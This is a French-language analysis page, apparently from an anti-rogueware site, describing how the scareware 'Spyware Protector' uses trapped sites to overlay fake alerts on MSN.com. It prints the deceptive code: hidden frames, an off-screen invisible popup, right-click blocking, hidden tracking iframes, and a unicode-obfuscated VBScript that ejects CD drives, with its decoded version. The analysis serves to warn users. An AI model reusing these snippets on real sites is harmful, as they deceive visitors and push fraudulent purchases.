Nous n'avons pas trouvé de lien direct entre cet outil crapuleux et la société RedV si ce n'est que celle-ci édite et distribue toute une série de logiciels crapuleux dont les noms sont dans une série xxx-Protector (PopUpProtector, HistoryProtector, X-Protector, AdProtector, PanicProtector, ProtectorSuite). On trouve 3 produits proposés simultanément à Spyware Protector, qui n'entrent pas dans cette convention de nommage : Website PopKiller, Anti-virus Protection et Memory Maximizer (ces produits sont introduits dans l'anti-logithèque).

Utilise la technique du téléchargement silencieux conduit par une popup invisible (Web Bug) sur des sites affiliés et piégés, puis affiche aussitôt, quasiment en plein écran, une popup effrayante. Cette image est l'archétype des popup tentant de vous faire peur. Le Web Bug invisible est lui-même encapsulé dans un frame invisible exécutant quelques scripts additionnels, le frame visible ouvrant en pleine fenêtre sur le véritable site de microsoft, MSN.com.

L'un de ces sites piégés est http://www.browser-page.com/my_home.html (le premier frame, invisible, va chercher http://www.browser-page.com/2top.html). C'est, lors d'un test du 07.08.04, le même site piégé (avec le même piège) que celui qui faisait la promotion de AdwareHunter il y a quelques mois.

<frameset framespacing="0" border="0" frameborder="0" rows="21,1%">
<frame name="top" src="2top.html" marginwidth="0" marginheight="0" scrolling="no" target="_self" noresize>
<frame name="bottom" src="http://www.msn.com" marginwidth="0" marginheight="0" scrolling="auto" noresize>
<noframes>
<body>
</body>
</noframes>
</frameset>

Le frame caché exécute ce script dont la fonction est d'aller chercher une page html (qui est la popup ci-dessous) à http://www.spywareprotector.com/Computer_Error.htm et de l'afficher par dessus la page du site MSN, 1 seconde après. Un son est joué et, simultanément, tous vos lecteurs de cd-rom s'ouvrent.

<script LANGUAGE="JavaScript">
<!-- Begin
closetime = 20; // Close window after __ number of seconds?
// 0 = do not close, anything else = number of seconds
function Start(URL, WIDTH, HEIGHT) {
windowprops = "left=5000,top=5000,width=" + WIDTH + ",height=" + HEIGHT; // Position de la fenêtre cachée
// Elle est affichée à partir du pixel 5000 en hauteur et du pixel 5000 en largeur
// Les résolutions d'écrans étant de 800*600 ou 1024*768, au maximum, 1600*1200, cette fenêtre ne sera jamais visible
preview = window.open(URL, "preview", windowprops);
if (closetime) setTimeout("preview.close();", closetime*1000);
}
function doPopup() {
url = "http://www.spywareprotector.com/Computer_Error.htm";
width = 1; // Largeur de la popup, en pixel : 1 pixel, donc invisible
height = 1; // Hauteur de la popup, en pixel : 1 pixel, donc invisible
delay = 0; // Délais en seconde avant l'ouverture de la popup
timer = setTimeout("Start(url, width, height)", delay*1000); // Attente d'1 seconde (1.000 millièmes de sec.) afin de déjouer certains anti-popup primaires
}
// End -->
</script>
</head>
<body OnLoad="doPopup();" topmargin="0" leftmargin="0" bgcolor="#004E82">
<script language=JavaScript>
<!--
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
</script>

<p align="center">
<a target="_blank" href="http://www.restorationhair.com/v4_step1.php?TID=bhome_701">
<img border="0" src="../google_ad1.gif" width="340" height="21"></a></p>
<!-- PayPopup.com Advertising Code Begin -->
<script LANGUAGE="JavaScript1.1" SRC="http://www.PayPopup.com/popup.php? id=EWNprasad&pop=enter&t=10&subid=18918&blk=1">
</SCRIPT>
<!-- PayPopup.com Advertising Code End -->
<script Language="JavaScript"> var D = new Date(); var TheDate =D.getTime();document.write('<iframe id="frame1" width=0 height=0 frameborder="no" scrolling="no" src="http://jsurfed.cjt1.net/HTM/446/0/JavaSiteRequest.asp? AW=446&LV=6000&DC=0&L=0& NF=0&IW=0&IH=0&ORD='+TheDate+'?" border="no"></iframe>')</script>
<!-- RON -CH RON, Tracking Pixel (Body) -->
<script language="javascript" src="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=1;dt=1;ac=5;c=731;"> </script><noscript>
<a href="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=2;dt=3;ac=5;c=731; " target="_blank"> <img width=1
height=1 src="http://z1.adserver.com/w/cp.x;rid=472;tid=6;ev=1;dt=3;ac=5;c=731;" border=0></a></noscript>
<!-- RON -CH RON, Tracking Pixel (Body) -->
</body>

La popup de fausse alerte, bien effrayante, suivie d'une seconde puis d'une pleine page (non représentée) tente une vente forcée. Le visiteur est induit en erreur car ceci s'affiche au dessus du site réel MSN de Microsoft et le visiteur incrédule est amené à penser que l'alerte provient de Microsoft lui-même. Nota : sur la page de vente de ce truc, l'incitation est augmentée par la proposition de trois outils additionneles, livrés en bundle avec. Ces 3 outils sont donc immédiatement suspects et introduits dans la liste des faux utilitaires "interdits" : Website PopKiller, Anti-virus Protection et Memory Maximizer.




En bas de page on trouve ce script crypté:

<script type="text/javascript">
document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u004c \u0041\u004e\u0047
\u0055\u0041\u0047\u0045\u003d\u0022\u0056\u0042\u0053\u0063\u0072 \u0069\u0070\u0074
\u0022\u003e\u000d\u000a\u003c\u0021\u002d\u002d\u000d\u000a\u0053 \u0065\u0074\u0020
\u006f\u0057\u004d\u0050\u0020\u003d\u0020\u0043\u0072\u0065\u0061 \u0074\u0065\u004f
\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0057\u004d\u0050\u006c \u0061\u0079\u0065
\u0072\u002e\u004f\u0043\u0058\u002e\u0037\u0022\u0020\u0029\u000d \u000a\u0053\u0065
\u0074\u0020\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073 \u0020\u003d\u0020
\u006f\u0057\u004d\u0050\u002e\u0063\u0064\u0072\u006f\u006d\u0043 \u006f\u006c\u006c
\u0065\u0063\u0074\u0069\u006f\u006e\u000d\u000a\u0069\u0066\u0020 \u0063\u006f\u006c
\u0043\u0044\u0052\u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e \u0074\u0020\u003e
\u003d\u0020\u0031\u0020\u0074\u0068\u0065\u006e\u000d\u000a\u0046 \u006f\u0072\u0020
\u0069\u0020\u003d\u0020\u0030\u0020\u0074\u006f\u0020\u0063\u006f \u006c\u0043\u0044
\u0052\u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020 \u002d\u0020\u0031
\u000d\u000a\u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073 \u002e\u0049\u0074
\u0065\u006d\u0028\u0069\u0029\u002e\u0045\u006a\u0065\u0063\u0074 \u000d\u000a\u004e
\u0065\u0078\u0074\u0020\u0027\u0020\u0063\u0064\u0072\u006f\u006d \u000d\u000a\u0045
\u006e\u0064\u0020\u0049\u0066\u000d\u000a\u002d\u002d\u003e\u000d \u000a\u003c\u002f
\u0073\u0063\u0072\u0069\u0070\u0074\u003e')

Ce qui donne, après décryptage :

<script type="text/javascript">document.write('<script LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</script>')


Il s'agit donc d'une opération d'éjection sur tous les cd-rom de la machine (on provoque leur ouverture).

Si on ne réagit pas assez vite à la première popup, une seconde, encore plus alarmante, apparait. Attention ! Le bouton de fermeture ne fonctionne pas (c'est une fausse fenêtre ! C'est entièrement une image cliquable ! Il s'agit juste d'un dessin d'une fenêtre Windows avec un texte plaqué dessus. Vous ne pouvez pas échapper à la réponse implicite "Ok" sauf à tuer votre navigateur Internet).



Lorsque vous voyez des choses comme cela, ne vous affolez pas : c'est complètement faux.